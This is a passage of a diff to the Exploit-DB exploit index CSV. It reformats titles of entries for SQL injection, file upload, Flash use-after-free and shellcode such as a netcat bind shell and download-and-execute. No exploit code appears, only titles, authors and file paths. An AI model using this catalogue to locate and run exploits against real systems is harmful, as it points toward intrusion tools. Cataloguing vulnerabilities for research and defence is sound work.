37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,hardware,webapps,0 37325,platforms/multiple/webapps/37325.txt,"Lively Cart SQL Injection",2015-06-19,"Manish Tanwar",multiple,webapps,0 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0 -37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 -37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 +37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 +37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37328,platforms/php/webapps/37328.php,"Small-Cms - 'hostname' Parameter Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 @@ -33704,7 +33704,7 @@ id,file,description,date,author,platform,type,port 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 -37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 +37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 @@ -33722,22 +33722,22 @@ id,file,description,date,author,platform,type,port 37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute shellcode",2015-06-24,B3mB4m,lin_x86,shellcode,0 37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot shellcode (28 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,Metasploit,windows,local,0 -37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,Metasploit,multiple,remote,0 +37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow",2015-06-24,Metasploit,multiple,remote,0 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x - 'Upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 -37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 +37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 37375,platforms/php/webapps/37375.php,"Joomla! Joomsport Component - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0 37377,platforms/php/webapps/37377.php,"WordPress HD FLV Player Plugin - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 -37378,platforms/php/webapps/37378.php,"Joomla! Simple SWFUpload Component 'uploadhandler.php' - Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 -37379,platforms/php/webapps/37379.php,"Joomla! Art Uploader Component 'upload.php' - Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 -37380,platforms/php/webapps/37380.php,"Joomla! DentroVideo Component 'upload.php' - Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 -37381,platforms/php/webapps/37381.html,"Joomla! IDoEditor Component 'image.php' - Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 -37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component 'script.php' - Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 -37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component 'helper.php' - Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37378,platforms/php/webapps/37378.php,"Joomla! Simple SWFUpload Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37379,platforms/php/webapps/37379.php,"Joomla! Art Uploader Component - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37380,platforms/php/webapps/37380.php,"Joomla! DentroVideo Component - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37381,platforms/php/webapps/37381.html,"Joomla! IDoEditor Component - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 +37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 +37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof Of Concept",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 @@ -33763,13 +33763,13 @@ id,file,description,date,author,platform,type,port 37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP Multiple SQL Injection",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0 37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0 -37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component 'flash_upload.php' - Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0 +37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0 37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 -37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' - Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 +37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injection",2012-06-16,JosS,php,webapps,0 37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0 -37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 +37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom Plugin - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 @@ -33792,7 +33792,7 @@ id,file,description,date,author,platform,type,port 37436,platforms/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",php,webapps,0 37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0 37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",php,webapps,0 -37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross-Site Scripting",2012-06-21,"Sooraj K.S",php,webapps,0 +37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 - Cross-Site Scripting",2012-06-21,"Sooraj K.S",php,webapps,0 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80 37441,platforms/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434 @@ -33801,7 +33801,7 @@ id,file,description,date,author,platform,type,port 37445,platforms/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0 37446,platforms/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80 37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF",2015-06-30,"Wissam Bashour",asp,webapps,0 -37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,Metasploit,multiple,remote,0 +37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption",2015-06-30,Metasploit,multiple,remote,0 37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0 37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 @@ -33809,7 +33809,7 @@ id,file,description,date,author,platform,type,port 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 -37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0 +37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use-After-Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0 37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor 'spellchecker.php') Cross-Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 37459,platforms/php/webapps/37459.txt,"Umapresence - Local File Inclusion / Arbitrary File Deletion",2012-06-25,"Sammy FORGIT",php,webapps,0 @@ -33872,7 +33872,7 @@ id,file,description,date,author,platform,type,port 37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI Redirection and Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 -37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,Metasploit,multiple,remote,0 +37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0 @@ -33883,7 +33883,7 @@ id,file,description,date,author,platform,type,port 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 -37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 +37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 @@ -33910,7 +33910,7 @@ id,file,description,date,author,platform,type,port 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 -37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 +37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 @@ -33928,7 +33928,7 @@ id,file,description,date,author,platform,type,port 37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 37587,platforms/php/webapps/37587.txt,"GetSimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 -37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross-Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 +37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37591,platforms/php/webapps/37591.php,"AraDown - 'id' Parameter SQL Injection",2012-08-08,G-B,php,webapps,0 37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 @@ -33938,7 +33938,7 @@ id,file,description,date,author,platform,type,port 37596,platforms/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80 37597,platforms/hardware/remote/37597.rb,"Accellion FTA getStatus verify_oauth_token Command Execution",2015-07-13,Metasploit,hardware,remote,443 37598,platforms/multiple/remote/37598.rb,"VNC Keyboard Remote Code Execution",2015-07-13,Metasploit,multiple,remote,5900 -37599,platforms/windows/remote/37599.rb,"Adobe Flash opaqueBackground Use After Free",2015-07-13,Metasploit,windows,remote,0 +37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free",2015-07-13,Metasploit,windows,remote,0 37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia Remote Code Execution",2015-07-13,Metasploit,multiple,remote,617 37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 @@ -34093,7 +34093,7 @@ id,file,description,date,author,platform,type,port 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,Un_N0n,windows,dos,0 -37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 +37764,platforms/windows/dos/37764.html,"Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 37767,platforms/multiple/webapps/37767.txt,"Joomla Event Manager 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 @@ -34166,61 +34166,61 @@ id,file,description,date,author,platform,type,port 38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce - Multiple SQL Injection",2012-09-21,"Ricardo Almeida",php,webapps,0 -37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 -37835,platforms/php/webapps/37835.html,"WordPress 3.4.2 - Cross Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 +37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 +37835,platforms/php/webapps/37835.html,"WordPress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 -37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 +37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 37842,platforms/windows/remote/37842.txt,"Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0 37843,platforms/windows/dos/37843.txt,"Flash Player Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos,0 -37844,platforms/windows/dos/37844.txt,"Flash AVSS.setSubscribedTags Use After Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0 +37844,platforms/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0 37845,platforms/windows/dos/37845.txt,"Flash Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0 37846,platforms/windows/dos/37846.txt,"Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0 -37847,platforms/windows/dos/37847.txt,"Flash AS2 Use After Free in TextField.filters",2015-08-19,bilou,windows,dos,0 -37848,platforms/windows/dos/37848.txt,"Flash AS2 Use After Free While Setting TextField.filters",2015-08-19,bilou,windows,dos,0 -37849,platforms/windows/dos/37849.txt,"Flash Use-After-Free in Display List Handling",2015-08-19,KeenTeam,windows,dos,0 -37850,platforms/multiple/dos/37850.txt,"Flash Use-After-Free in NetConnection.connect",2015-08-19,"Google Security Research",multiple,dos,0 +37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 +37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 +37849,platforms/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,windows,dos,0 +37850,platforms/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0 -37852,platforms/multiple/dos/37852.txt,"Adobe Flash Use-After-Free When Setting Variable",2015-08-19,"Google Security Research",multiple,dos,0 -37853,platforms/windows/dos/37853.txt,"Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap",2015-08-19,"Google Security Research",windows,dos,0 -37854,platforms/windows/dos/37854.txt,"Flash Use-After-Free with MovieClip.scrollRect in AS2",2015-08-19,"Google Security Research",windows,dos,0 -37855,platforms/multiple/dos/37855.txt,"Adobe Flash Use-After-Free When Setting Value",2015-08-19,"Google Security Research",multiple,dos,0 -37856,platforms/windows/dos/37856.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File",2015-08-19,"Google Security Research",windows,dos,0 -37857,platforms/windows/dos/37857.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File (2)",2015-08-19,"Google Security Research",windows,dos,0 -37858,platforms/windows/dos/37858.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0 -37859,platforms/multiple/dos/37859.txt,"Adobe Flash Use-After-Free in XML.childNodes",2015-08-19,"Google Security Research",multiple,dos,0 -37860,platforms/windows/dos/37860.txt,"Flash Use-After-Free with Color.setRGB in AS2",2015-08-19,bilou,windows,dos,0 -37861,platforms/windows/dos/37861.txt,"Flash AS2 Use-After-Free in DisplacementMapFilter.mapBitmap (2)",2015-08-19,bilou,windows,dos,0 -37862,platforms/windows/dos/37862.txt,"Adobe Flash Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0 -37863,platforms/multiple/dos/37863.txt,"Adobe Flash Use-After-Free in scale9Grid",2015-08-19,"Google Security Research",multiple,dos,0 +37852,platforms/multiple/dos/37852.txt,"Adobe Flash - Setting Variable Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37853,platforms/windows/dos/37853.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (1)",2015-08-19,"Google Security Research",windows,dos,0 +37854,platforms/windows/dos/37854.txt,"Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0 +37855,platforms/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37856,platforms/windows/dos/37856.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated SWF File",2015-08-19,"Google Security Research",windows,dos,0 +37857,platforms/windows/dos/37857.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated SWF File (2)",2015-08-19,"Google Security Research",windows,dos,0 +37858,platforms/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0 +37859,platforms/multiple/dos/37859.txt,"Adobe Flash - XML.childNodes Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37860,platforms/windows/dos/37860.txt,"Adobe Flash AS2 - Color.setRGB Use-After-Free",2015-08-19,bilou,windows,dos,0 +37861,platforms/windows/dos/37861.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 +37862,platforms/windows/dos/37862.txt,"Adobe Flash - Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0 +37863,platforms/multiple/dos/37863.txt,"Adobe Flash - scale9Grid Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37864,platforms/multiple/dos/37864.txt,"Adobe Flash - Use-After-Free in Drawing Methods 'this'",2015-08-19,"Google Security Research",multiple,dos,0 -37865,platforms/multiple/dos/37865.txt,"Adobe Flash Use-After-Free in attachMovie",2015-08-19,"Google Security Research",multiple,dos,0 -37866,platforms/linux/dos/37866.txt,"Adobe Flash Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0 -37867,platforms/linux/dos/37867.txt,"Adobe Flash Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0 -37868,platforms/linux/dos/37868.txt,"Adobe Flash Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0 -37869,platforms/linux/dos/37869.txt,"Adobe Flash Pointer Crash in Button 